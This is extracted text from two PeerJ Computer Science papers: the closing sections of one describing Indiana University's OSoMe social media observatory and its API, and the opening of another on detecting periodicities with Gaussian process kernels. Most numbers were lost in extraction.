tool let users specify a hashtag, a temporal interval, and the type of diffusion ties to visualize (retweets, mentions, or hashtag co-occurrence). (b) example of a generated movie frame, showing a retweet network for the # icebucketchallenge hashtag. youtube: https://www.youtube.com/watch?v=nzkhrtpciyu. figure heatmap of tweets containing the hashtag #snow on january , , the day of a large snowstorm over the eastern united states. davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.youtube.com/watch?v=nzkhrtpciyu http://dx.doi.org/ . /peerj-cs. retrieved instantly, enabling other users to browse and interact with these previously-created visualizations. in the future we hope to experiment with overlaying diffusion networks on top of geographical maps, for example using multi-scale backbone extraction (serrano, boguná & vespignani, ) and edge bundling techniques (selassie, heller & heer, ). an important caveat for the use of the maps tool is that it is based on the very small percentage of tweets that contain exact geolocation coordinates. furthermore, as already discussed, this percentage has changed over time. api we expect that the majority of users of the observatory will interact with its data primarily through the tools described above. however, since more advanced data needs are to be expected, we also provide a way to export the data for those who wish to create their own visualizations and develop custom analyses. this is possible either within the tools, via export buttons, and through a read-only http api. the osome api is deployed via the mashape management service. four public methods are currently available. each takes as input a time interval and a list of tokens (hashtags and/or usernames): • tweet-id: returns a list of tweet ids mentioning at least one of the inputs in the given interval; • counts: returns a count of the number of tweets mentioning each input token in the given interval; • time-series: for each day in the given time interval, returns a count of tweets matching any of the input tokens; • user-post-count: returns a list of user ids mentioning any of the tokens in the given time frame, along with a count of matching tweets produced by each user. evaluation in the first several weeks since launch, the osome infrastructure has served a large number of requests, as shown in fig. . the spike corresponds to may , , the date of a press release about the launch. most of these requests complete successfully, with no particular deterioration for increasing loads (fig. ). to evaluate the scalability of the hadoop-based analytics tools with increasing data size, we plot in fig. the run time of queries submitted by users through osome interactive tools, as a function of the number of tweets matching the query parameters. we observe a sublinear growth, suggesting that the system scales well with job size. a job may take from approximately s to several hours depending on many factors such as system load and number of tweets processed. however, even different queries that process the same number of tweets may perform differently, depending on the width of the query time window. this is partly due to ‘‘hotspotting’’: the temporal locality of our data layout across the nodes of the storage cluster causes decreases in performance when different hadoop mappers access the same disks. a query spanning a short period of time runs slower than one matching the same number of tweets over a longer period. these results suggest that our data layout davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure number of daily requests to the observatory, including both api calls and interactive queries. the inset shows the same data, on a logarithmic scale. figure fraction of successful requests as a function of daily request load. error bars are standard er- rors within logarithmic bins. design may need to be reconsidered in future development. an alternative approach to improve performance of queries is to entirely remove the bottleneck of hadoop processing by indexing additional data. for example, in the networks and movies tools, we could index the retweet and mention edges. the resulting queries would utilize the indices only, resulting in response times comparable to those of the trends tool. finally, we tested the scalability of queries using the hbase index with the load. figure shows that the total run time is not strongly affected by the number of concurrent jobs, up to the size of the task queue ( ). for larger loads, run time scales linearly as expected. davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure run time versus number of tweets processed by hadoop-based interactive tools. the line is a guide for the eye corresponding to linear growth. figure run time versus number of concurrent jobs that use the hbase index. the line is a guide for the eye representing linear growth. davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusion the iuni observatory on social media is the culmination of a large collaborative effort at indiana university that took place over the course of six years. we hope that it will facilitate computational social science and make big social data easier to analyze by a broad community of researchers, reporters, and the general public. the lessons learned during the development of the infrastructure may be helpful for future endeavors to foster data-intensive research in the social, behavioral, and economic sciences. we welcome feedback from researchers and other end users about usability and usefulness of the tools presented here. in the future, we plan to carry out user studies and tutorial workshops to gain feedback on effectiveness of the user interfaces, efficiency of the tools, and desirable extensions. we encourage the research community to create new social media analytic tools by building upon our system. as an illustration, we created a mashup of the osome api with the botornot api (davis et al., ), also developed by our team, to evaluate the extent to which twitter campaigns are sustained by social bots. the software is freely available online (davis, ). the opportunities that arise from the observatory, and from computational social science in general, could have broad societal impact. systematic attempts to mislead the public on a large scale through ‘‘astroturf’’ campaigns and social bots have been uncovered using big social data analytics, inspiring the development of machine learning methods to detect these abuses (ratkiewicz et al., a; ferrara et al., ; subrahmanian et al., ). allowing citizens to observe how memes spread online may help raise public awareness of the potential dangers of social media manipulation. acknowledgements the authors would like to acknowledge alessandro vespignani and johan bollen for discussions leading to the early vision of an observatory on social media; and rob henderson, shing-shong (bruce) shei, gary miksik, allan streib, and koji tanaka for their kind assistance with system administration. we are deeply grateful to twitter for supporting computational social science research, including the efforts described in this paper, by granting our lab elevated access to the public stream of tweets. any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the funding agencies. additional information and declarations funding this work was supported in part by nsf (grants ccf- and oci- ), the j.s. mcdonnell foundation (grant ), the swiss national science foundation (fellowship pbtip _ ), the lilly endowment, the center for complex networks and systems research (cnets), the digital science center (dsc), and the indiana university davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. network science institute (iuni). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nsf: ccf- , oci- . j.s. mcdonnell foundation: pbtip _ . lilly endowment, the center for complex networks and systems research. digital science center. indiana university network science institute. competing interests filippo menczer is an academic editor for peerj computer science. xiaoming gao is an employee of facebook; luca maria aiello is an employee of bell labs; snehal patil is an employee of yahoo!; mike conover is an employee of linkedin; mark meiss, jacob ratkiewicz, and alex rudnick are employees of google; lilian weng is an employee of affirm; and tak-lon wu is an employee of amazon. author contributions • clayton a. davis and giovanni luca ciampaglia wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • luca maria aiello, keychul chung, michael d. conover, emilio ferrara, xiaoming gao, bruno gonçalves, przemyslaw a. grabowicz, kibeom hong, pik-mai hui, scott mccaulay, karissa mckelvey, mark r. meiss, snehal patil, chathuri peli kankanamalage, jacob ratkiewicz, alex rudnick, prashant shiralkar, onur varol, lilian weng, tak-lon wu and andrew j. younge performed the computation work, reviewed drafts of the paper. • alessandro flammini, geoffrey c. fox, valentin pentchev and judy qiu reviewed drafts of the paper. • benjamin serrette prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • filippo menczer wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): this study was deemed exempt from review by the indiana university irb office under protocol # . data availability the following information was supplied regarding data availability: data from the osome are available through an api and through interactive apps. use of the data is subject to the terms of the twitter developer agreement davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (https://dev.twitter.com/overview/terms/agreement). for more information please visit: http://osome.iuni.iu.edu/. it is important to note that, in compliance with the twitter terms of service (https://dev.twitter.com/overview/terms/policy), osome does not provide access to the content of tweets. however, researchers can obtain numeric object identifiers in response to their queries. this information can then be used to retrieve tweet content via the official twitter api. references alvarez-hamelin ji, dall’asta l, barrat a, vespignani a. . large scale networks fingerprinting and visualization using the k-core decomposition. in: advances in neural information processing systems (nips). cambridge: mit press, – . andalibi n, ozturk p, forte a. . depression-related imagery on instagram. in: proc. th acm conference companion on computer supported cooperative work & social computing (cscw). new york: acm, – . antenucci d, cafarella m, levenstein m, ré c, shapiro md. . using social media to measure labor market flows. working paper . national bureau of economic research doi . /w . backstrom l, boldi p, rosa m, ugander j, vigna s. . four degrees of separation. in: proceedings of the th annual acm web science conference websci ’ . new york: acm, – . bakshy e, rosenn i, marlow c, adamic l. . the role of social networks in informa- tion diffusion. in: proceedings of the st acm international conference on world wide web. new york: acm, – . bollen j, mao h, zeng x. . twitter mood predicts the stock market. journal of computational science ( ): – doi . /j.jocs. . . . card s. . information visualization. in: human–computer interaction: design issues, solutions, and applications. boca raton: crc press, – . choi h, varian h. . predicting the present with google trends. economic record (s ): – doi . /j. - . . .x. ciampaglia gl, flammini a, menczer f. . the production of information in the attention economy. scientific reports :article doi . /srep . conover m, davis c, ferrara e, mckelvey k, menczer f, flammini a. a. the geospatial characteristics of social movement communication networks. plos one ( ):e doi . /journal.pone. . conover m, ferrara e, menczer f, flammini a. b. the digital evolution of occupy wall street. plos one ( ):e doi . /journal.pone. . conover md, gonçalves b, flammini a, menczer f. . partisan asymmetries in online political activity. epj data science : doi . /epjds . conover m, gonçalves b, ratkiewicz j, flammini a, menczer f. a. predicting the political alignment of twitter users. in: proceedings of the rd ieee conference on social computing (socialcom). piscataway: ieee. davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://dev.twitter.com/overview/terms/agreement http://osome.iuni.iu.edu/ https://dev.twitter.com/overview/terms/policy http://dx.doi.org/ . /w http://dx.doi.org/ . /j.jocs. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /srep http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /epjds http://dx.doi.org/ . /peerj-cs. conover m, ratkiewicz j, francisco m, gonçalves b, flammini a, menczer f. b. political polarization on twitter. in: proceedings of the th international aaai conference on weblogs and social media (icwsm). palo alto: aaai. davis ca. . osome mashups. available at https://github.com/iunetsci/osome- mashups/ (accessed on july ). davis ca, varol o, ferrara e, flammini a, menczer f. . botornot: a system to evaluate social bots. proceedings of the www developers day workshop. arxiv preprint. arxiv: . . de choudhury m, gamon m, counts s, horvitz e. . predicting depression via social media. in: proceedings of the th international aaai conf. on weblogs and social media (icwsm). palo alto: aaai. difranzo d, erickson js, gloria mjkt, luciano js, mcguinness dl, hendler j. . the web observatory extension: facilitating web science collaboration through semantic markup. in: proceedings of the rd intl. conference on world wide web companion, – . digrazia j, mckelvey k, bollen j, rojas f. . more tweets, more votes: social media as a quantitative indicator of political behavior. plos one ( ):e doi . /journal.pone. . einav l, levin j. . economics in the age of big data. science ( ): – doi . /science. . ferrara e, varol o, davis c, menczer f, flammini a. . the rise of social bots. communications of the acm ( ): – doi . / . ferrara e, varol o, menczer f, flammini a. . traveling trends: social butterflies or frequent fliers? in: proceedings of the st acm conference on online social networks (cosn). new york: acm, – . fiske st, hauser rm. . protecting human research participants in the age of big data. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . fox gc, jha s, qiu j, luckow a. . towards an understanding of facets and exem- plars of big data applications. in: proceedings of years of beowulf: workshop to honor thomas sterling’s th birthday, – . gao x, ferrara e, qiu j. . parallel clustering of high-dimensional social media data streams. in: proceedings of the th ieee/acm international symposium on cluster, cloud and grid computing (ccgrid). piscataway: ieee, – . gao x, nachankar v, qiu j. . experimenting lucene index on hbase in an hpc environment. in: proceedings of acm high performance computing meets databases workshop (hpcdb’ ) at supercomputing . new york: acm, – . gao x, qiu j. . supporting end-to-end social media data analysis with the indexed- hbase platform. in: proceedings of the th workshop on many-task computing on clouds, grids, and supercomputers (mtags) at sc . gao x, qiu j. . supporting queries and analyses of large-scale social media data with customizable and scalable indexing techniques over nosql databases. in: davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/iunetsci/osome-mashups/ https://github.com/iunetsci/osome-mashups/ http://arxiv.org/abs/ . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /science. http://dx.doi.org/ . / http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /peerj-cs. proceedings of the th ieee/acm international symposium on cluster, cloud and grid computing (ccgrid ). piscataway: ieee, – . gao x, roth e, mckelvey k, davis c, younge a, ferrara e, menczer f, qiu j. . supporting a social media observatory with customizable index structures: archi- tecture and performance. in: cloud computing for data intensive applications. berlin heidelberg: springer, – . grabowicz pa, aiello lm. . fastviz. available at https://github.com/wici/fastviz (accessed on july ). grabowicz pa, aiello lm, menczer f. . fast filtering and animation of large dy- namic networks. epj data science ( ): – doi . /epjds/s - - - . gruhl d, guha r, liben-nowell d, tomkins a. . information diffusion through blogspace. in: proceedings of the th international acm conference on world wide web, www ’ , – . guille a, hacid h, favre c, zighed da. . information diffusion in online social networks. sigmod record ( ): – doi . / . . hargittai e. . is bigger always better? potential biases of big data derived from social network sites. the annals of the american academy of political and social science ( ): – doi . / . harriman s, patel j. . the ethics and editorial challenges of internet-based research. bmc medicine : doi . /s - - - . healy k, moody j. . data visualization in sociology. annual review of sociology : – doi . /annurev-soc- - . jha s, qiu j, luckow a, mantha p, fox gc. . a tale of two data-intensive paradigms: applications, abstractions, and architectures. in: proceedings of the rd international congress on big data conference (ieee bigdata). piscataway: ieee. kahn jp, vayena e, mastroianni ac. . opinion: learning as we go: lessons from the publication of facebook’s social-computing research. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . kamada t, kawai s. . an algorithm for drawing general undirected graphs. information processing letters ( ): – doi . / - ( ) - . king g. . ensuring the data-rich future of the social sciences. science ( ): – doi . /science. . kramer ad, guillory je, hancock jt. . experimental evidence of massive-scale emotional contagion through social networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . lazer d, pentland a, adamic l, aral s, barabási a-l, brewer d, christakis n, contrac- tor n, fowler j, gutmann m, jebara t, king g, macy m, roy d, van alstyne m. . computational social science. science ( ): – doi . /science. . davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/wici/fastviz http://dx.doi.org/ . /epjds/s - - - http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /annurev-soc- - http://dx.doi.org/ . /pnas. http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /science. http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. link bg, phelan jc, bresnahan m, stueve a, pescosolido ba. . public conceptions of mental illness: labels, causes, dangerousness, and social distance. american journal of public health ( ): – doi . /ajph. . . . mckelvey k, menczer f. a. design and prototyping of a social media observatory. in: proceedings of the nd international conference on world wide web (www) companion, – . mckelvey k, menczer f. b. truthy: enabling the study of online social networks. in: proc. th acm conference on computer supported cooperative work and social computing companion (cscw). new york: acm. moran ef, hofferth sl, eckel cc, hamilton d, entwisle b, aber jl, brady he, conley d, cutter sl, hubacek k, scholz jt. . opinion: building a st-century infrastructure for the social sciences. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . morstatter f, pfeffer j, liu h, carley km. . is the sample good enough? comparing data from twitter’s streaming api with twitter’s firehose. in: proceedings of the th international aaai conference on weblogs and social media (icwsm). new york: acm. nematzadeh a, ferrara e, flammini a, ahn y-y. . optimal network modularity for information diffusion. physical review letters : doi . /physrevlett. . . open science collaboration. . estimating the reproducibility of psychological science. science ( ):aac doi . /science.aac . qiu j, jha s, luckow a, fox gc. . towards hpc-abds: an initial high-performance big data stack. in: proceedings of st acm big data interoperability framework workshop: building robust big data ecosystem. new york: acm. raento m, oulasvirta a, eagle n. . smartphones: an emerging tool for social scien- tists. sociological methods & research ( ): – doi . / . rafaeli s. . interactivity: from new media to communication. sage annual review of communication research: advancing communication science (ca): – . ratkiewicz j, conover m, meiss m, gonçalves b, flammini a, menczer f. a. detecting and tracking political abuse in social media. in: proceedings of the th international aaai conf. on weblogs and social media (icwsm). palo alto: aaai. ratkiewicz j, conover m, meiss m, gonçalves b, patil s, flammini a, menczer f. b. truthy: mapping the spread of astroturf in microblog streams. in: proceedings th international world wide web conference companion (www). romero dm, meeder b, kleinberg j. . differences in the mechanics of information diffusion across topics: idioms, political hashtags, and complex contagion on twitter. in: proceedings of the th international conference on world wide web (www), – . ruths d, pfeffer j. . social media for large studies of behavior. science ( ): – doi . /science. . . . sanfilippo s. . redis. available at http://redis.io/ (accessed on april ). davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ajph. . . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . /science.aac http://dx.doi.org/ . / http://dx.doi.org/ . /science. . . http://redis.io/ http://dx.doi.org/ . /peerj-cs. selassie d, heller b, heer j. . divided edge bundling for directional network data. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . serrano mÁ, boguná m, vespignani a. . extracting the multiscale backbone of complex weighted networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . solem a, contributors. . celery. available at http://www.celeryproject.org/ (accessed on april ). subrahmanian v, azaria a, durst s, kagan v, galstyan a, lerman k, zhu l, ferrara e, flammini a, menczer f, stevens a, dekhtyar a, gao s, hogg t, kooti f, liu y, varol o, shiralkar p, vydiswaran v, mei q, hwang t. . the darpa twitter bot challenge. ieee computer ( ): – doi . /mc. . . tene o, polonetsky j. . privacy in the age of big data: a time for big decisions. stanford law review online : . terna p. . simulation tools for social scientists: building agent based models with swarm. journal of artificial societies and social simulation ( ): – . the apache software foundation. a. apache hbase. available at http://hbase. apache.org/ (accessed on april ). the apache software foundation. b. hadoop. available at http://hadoop.apache. org/ (accessed on april ). the apache software foundation. c. apache solr. available at http://lucene.apache. org/solr/ (accessed on april ). the apache software foundation. d. apache hadoop yarn. available at http: //hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/yarn.html (accessed on april ). travers j, milgram s. . an experimental study of the small world problem sociometry ( ): – . twitter, inc. . developer policy. available at https://dev.twitter.com/overview/ terms/policy. internet archive: https://web.archive.org/web/ /https: //dev.twitter.com/overview/terms/policy (accessed on september ). varol o, ferrara e, ogan c, menczer f, flammini a. . evolution of online user behavior during a social upheaval. in: proceedings of the acm web science conference (websci). new york: acm. vayena e, salathé m, madoff lc, brownstein js. . ethical challenges of big data in public health. plos computational biology ( ):e doi . /journal.pcbi. . weng l, flammini a, vespignani a, menczer f. . competition among memes in a world with limited attention. scientific reports ( ):srep doi . /srep . weng l, menczer f. . topicality and impact in social media: diverse messages, focused messengers. plos one ( ):e doi . /journal.pone. . weng l, menczer f, ahn y-y. . virality prediction and community structure in social networks. scientific reports : doi . /srep . davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /pnas. http://www.celeryproject.org/ http://dx.doi.org/ . /mc. . http://hbase.apache.org/ http://hbase.apache.org/ http://hadoop.apache.org/ http://hadoop.apache.org/ http://lucene.apache.org/solr/ http://lucene.apache.org/solr/ http://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/yarn.html http://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/yarn.html https://dev.twitter.com/overview/terms/policy https://dev.twitter.com/overview/terms/policy https://web.archive.org/web/ /https://dev.twitter.com/overview/terms/policy https://web.archive.org/web/ /https://dev.twitter.com/overview/terms/policy http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /srep http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /srep http://dx.doi.org/ . /peerj-cs. weng l, menczer f, ahn y-y. . predicting successful memes using network and community structure. in: proceedings of the eighth international aaai conference on weblogs and social media (icwsm). palo alto: aaai. weng l, ratkiewicz j, perra n, gonçalves b, castillo c, bonchi f, schifanella r, menczer f, flammini a. . the role of information diffusion in the evolution of social networks. in: proceedings of the th acm sigkdd conference on knowledge discovery and data mining (kdd). wiggins tb, gao x, qiu j. . indexedhbase. available at http://salsaproj.indiana.edu/ indexedhbase (accessed on april ). wu t-l, zhang b, davis ca, ferrara e, flammini a, menczer f, qiu j. . scalable query and analysis for social networks: an integrated high-level dataflow system with pig and harp. in: thai mt, xiong h, wu w, eds. big data in complex and social networks. boca raton: chapman and hall/crc. in press. zimmer m. . the twitter archive at the library of congress: challenges for informa- tion practice and information policy. first monday ( ): doi . /fm.v i . . davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://salsaproj.indiana.edu/indexedhbase http://salsaproj.indiana.edu/indexedhbase http://dx.doi.org/ . /fm.v i . http://dx.doi.org/ . /peerj-cs. submitted october accepted february published april corresponding author nicolas durrande, durrande@emse.fr academic editor kathryn laskey additional information and declarations can be found on page doi . /peerj-cs. copyright durrande et al. distributed under creative commons cc-by . open access detecting periodicities with gaussian processes nicolas durrande , james hensman , magnus rattray and neil d. lawrence institut fayol—limos, mines saint-Étienne, saint-Étienne, france chicas, faculty of health and medicine, lancaster university, lancaster, united kingdom faculty of life sciences, university of manchester, manchester, united kingdom department of computer science and sheffield institute for translational neuroscience, university of sheffield, sheffield, united kingdom abstract we consider the problem of detecting and quantifying the periodic component of a function given noise-corrupted observations of a limited number of input/output tuples. our approach is based on gaussian process regression, which provides a flexible non-parametric framework for modelling periodic data. we introduce a novel decomposition of the covariance function as the sum of periodic and aperiodic kernels. this decomposition allows for the creation of sub-models which capture the periodic nature of the signal and its complement. to quantify the periodicity of the signal, we derive a periodicity ratio which reflects the uncertainty in the fitted sub-models. although the method can be applied to many kernels, we give a special emphasis to the matérn family, from the expression of the reproducing kernel hilbert space inner product to the implementation of the associated periodic kernels in a gaussian process toolkit. the proposed method is illustrated by considering the detection of periodically expressed genes in the arabidopsis genome. subjects data mining and machine learning, optimization theory and computation keywords rkhs, harmonic analysis, circadian rhythm, gene expression, matérn kernels introduction the periodic behaviour of natural phenomena arises at many scales, from the small wavelength of electromagnetic radiations to the movements of planets. the mathematical study of natural cycles can be traced back to the nineteenth century with thompson’s harmonic analysis for predicting tides (thomson, ) and schuster’s investigations on the periodicity of sunspots (schuster, ). amongst the methods that have been considered for detecting and extracting the periodic trend, one can cite harmonic analysis (hartley, ), folding methods (stellingwerf, ; leahy et al., ) which are mostly used in astrophysics and periodic autoregressive models (troutman, ; vecchia, ). in this article, we focus on the application of harmonic analysis in reproducing kernel hilbert spaces (rkhs) and on the consequences for gaussian process modelling. our approach provides a flexible framework for inferring both the periodic and aperiodic components of sparsely sampled and noise-corrupted data, providing a principled means for quantifying the degree of periodicity. we demonstrate our proposed method on the problem of identifying periodic genes in gene expression time course data, comparing performance with a popular alternative approach to this problem. how to cite this article durrande et al. ( ), detecting periodicities with gaussian processes. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:durrande@emse.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. harmonic analysis is based on the projection of a function onto a basis of periodic functions. for example, a natural method for extracting the π-periodic trend of a function f is to decompose it in a fourier series: f (x)→ fp(x)=a sin(x)+a cos(x)+a sin( x)+a cos( x)+··· ( ) where the coefficients ai are given, up to a normalising constant, by the l inner product between f and the elements of the basis. however, the phenomenon under study is often observed at a limited number of points, which means that the value of f (x) is not known for all x but only for a small set of inputs {x ,...,xn}called the observation points. with this limited knowledge of f , it is not possible to compute the integrals of the l inner product so the coefficients ai cannot be obtained directly. the observations may also be corrupted by noise, further complicating the problem. a popular approach to overcome the fact that f is partially known is to build a mathematical model m to approximate it. a good model m has to take into account as much information as possible about f . in the case of noise-free observations it interpolates f for the set of observation points m(xi)= f (xi) and its differentiability corresponds to the assumptions one can have about the regularity of f . the main body of literature tackling the issue of interpolating spatial data is scattered over three fields: (geo-)statistics (matheron, ; stein, ), functional analysis (aronszajn, ; berlinet & thomas-agnan, ) and machine learning (rasmussen & williams, ). in the statistics and machine learning framework, the solution of the interpolation problem corresponds to the expectation of a gaussian process, z, which is conditioned on the observations. in functional analysis, the problem reduces to finding the interpolator with minimal norm in a rkhs h. as many authors pointed out (for example berlinet & thomas-agnan ( ) and scheuerer, schaback & schlather ( )), the two approaches are closely related. both z and h are based on a common object which is a positive definite function of two variables k(.,.). in statistics, k corresponds to the covariance of z and for the functional counterpart, k is the reproducing kernel of h. from the regularization point of view, the two approaches are equivalent since they lead to the same model m (wahba, ). although we will focus hereafter on the rkhs framework to design periodic kernels, we will also take advantage of the powerful probabilistic interpretation offered by gaussian processes. we propose in this article to build the fourier series using the rkhs inner product instead of the l one. to do so, we extract the sub-rkhs hp of periodic functions in h and model the periodic part of f by its orthogonal projection onto hp. one major asset of this approach is to give a rigorous definition of non-periodic (or aperiodic) functions as the elements of the sub-rkhs ha=h⊥p . the decomposition h=hp⊕ha then allows discrimination of the periodic component of the signal from the aperiodic one. although some expressions of kernels leading to rkhs of periodic functions can be found in the literature (rasmussen & williams, ), they do not allow to extract the periodic part of the signal. indeed, usual periodic kernels do not come with the expression of an aperiodic kernel. it is thus not possible to obtain a proper decomposition of the space as the direct sum of periodic and aperiodic subspaces and the periodic sub-model cannot be rigorously obtained. durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure plots of the benchmark test functions, observation points and fitted models. for an improved visibility, the plotting region is limited to one period. the rmse is computed using a grid of evenly spaced points spanning [ , ], and the values indicated on each subplot correspond respectively to cosopt, the periodic gaussian process model and linear regression. the python code used to generate this figure is provided as jupyter notebook in supplemental information . the last part of this introduction is dedicated to a motivating example. in ‘kernels of periodic and aperiodic subspaces,’ we focus on the construction of periodic and aperiodic kernels and on the associated model decomposition. ‘application to matérn kernels’ details how to perform the required computations for kernels from the matérn familly. ‘quantifying the periodicity t’ introduces a new criterion for measuring the periodicity of the signal. finally, the last section illustrates the proposed approach on a biological case study where we detect, amongst the entire genome, the genes showing a cyclic expression. the examples and the results presented in this article have been generated with the version . of the python gaussian process toolbox gpy. this toolbox, in which we have implemented the periodic kernels discussed here, can be downloaded at http://github.com/sheffieldml/gpy. furthermore, the code generating the figs. – is provided in the supplemental information as jupyter notebooks. motivating example to illustrate the challenges of determining a periodic function, we first consider a benchmark of six one dimensional periodic test functions (see fig. and appendix a). these functions include a broad variety of shapes so that we can understand the effect of shape on methods with different modelling assumptions. a set x =(x ,...,x ) of equally spaced observation points is used as training set and a n( , . ) observation noise is added to each evaluation of the test function: fi= f (xi)+εi (or f = f (x)+ε with vector durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://github.com/sheffieldml/gpy http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure examples of decompositions of a kernel as a sum of a periodic and aperiodic sub-kernels. (a) matérn / kernel k(., ). (b) periodic sub-kernel kp(., ). (c) aperiodic sub-kernel ka(., ). for these plots, one of the kernels variables is fixed to . the three graphs on each plot correspond to a different value of the lengthscale parameter `. the input space is d = [ , π] and the cut-off frequency is q = . the python code used to generate this figure is provided as jupyter notebook in supplemental informa- tion . figure decomposition of a gaussian process fit. (a) full model m; (b) periodic portion mp and (c) aperiodic portion ma. our decomposition allows for recognition of both periodic and aperiodic parts. in this case maximum likelihood estimation was used to determine the parameters of the kernel, we recov- ered (σ p ,`p,σ a ,`a)=( . , . , . , . ). the python code used to generate this figure is provided as jupyter notebook in supplemental information . notations). we consider three different modelling approaches to compare the facets of different approaches based on harmonic analysis: • cosopt (straume, ), which fits cosine basis functions to the data, • linear regression in the weights of a truncated fourier expansion, • gaussian process regression with a periodic kernel. cosopt. cosopt is a method that is commonly used in biostatistics for detecting periodically expressed genes (hughes et al., ; amaral & johnston, ). it assumes the following model for the signal: y(x)=α+βcos(ωx+ϕ)+ε, ( ) where ε corresponds to white noise. the parameters α, β, ω and ϕ are fitted by minimizing the mean square error. durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. linear regression. we fit a more general model with a basis of sines and cosines with periods , / ..., / to account for periodic signal that does not correspond to a pure sinusoidal signal. y(x)=α+ ∑ i= βicos( πix)+ ∑ i= γisin( πix)+ε. ( ) again, model parameters are fitted by minimizing the mean square error which corresponds to linear regression over the basis weights. gaussian process with periodic covariance function. we fit a gaussian process model with an underlying periodic kernel. we consider a model, y(x)=α+yp(x)+ε, ( ) where yp is a gaussian process and where α should be interpreted as a gaussian random variable with zero mean and variance σ α. the periodicity of the phenomenon is taken into account by choosing a process yp such that the samples are periodic functions. this can be achieved with a kernel such as kp(x,x ′)=σ exp ( − sin ( ω(x−x′) ) ` ) ( ) or with the kernels discussed later in the article. for this example we choose the periodic matérn / kernel which is represented in fig. b. for any kernel choice, the gaussian process regression model can be summarized by the mean and variance of the conditional distribution: m(x)=e[y(x)|y(x) = f]=k(x,x)(k(x,x)+τ i)− f v(x)=var[y(x)|y(x) = f]=k(x,x)−k(x,x)(k(x,x)+τ i)− k(x,x) ( ) where k =σ α+kp and i is the × identity matrix. in this expression, we introduced matrix notation for k: if a and b are vectors of length n and m, then k(a,b) is a n×m matrix with entries k(a,b)i,j =k(ai,bj). the parameters of the model (σ α,σ ,`,τ ) can be obtained by maximum likelihood estimation. the models fitted with cosopt, linear regression and the periodic gaussian process model are compared in fig. . it can be seen that the latter clearly outperforms the other models since it can approximate non sinusoidal patterns (in opposition to cosopt) while offering a good noise filtering (no high frequencies oscillations corresponding to noise overfitting such as for linear regression). the gaussian process model gives an effective non-parametric fit to the different functions. in terms of root mean square error (rmse) in each case, it is either the best performing method, or it performs nearly as well as the best performing method. both linear regression and cosopt can fail catastrophically on one or more of these examples. although highly effective for purely periodic data, the use of a periodic gaussian processes is less appropriate for identifying the periodic component of a pseudo- periodic function such as f (x)= cos(x)+ . exp(−x). an alternative suggestion is durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to consider a pseudo-periodic gaussian process y = y +yp with a kernel given by the sum of a usual kernel k and a periodic one kp (see e.g., rasmussen & williams, ( )). such a construction allows decomposition of the model into a sum of sub- models m(x)=e[y (x)|y(x) = f]+e[yp(x)|y(x) = f] where the latter is periodic (see ‘decomposition in periodic and aperiodic sub-models’ for more details). however, the periodic part of the signal is scattered over the two sub-models so it is not fully represented by the periodic sub-model. it would therefore be desirable to introduce new covariance 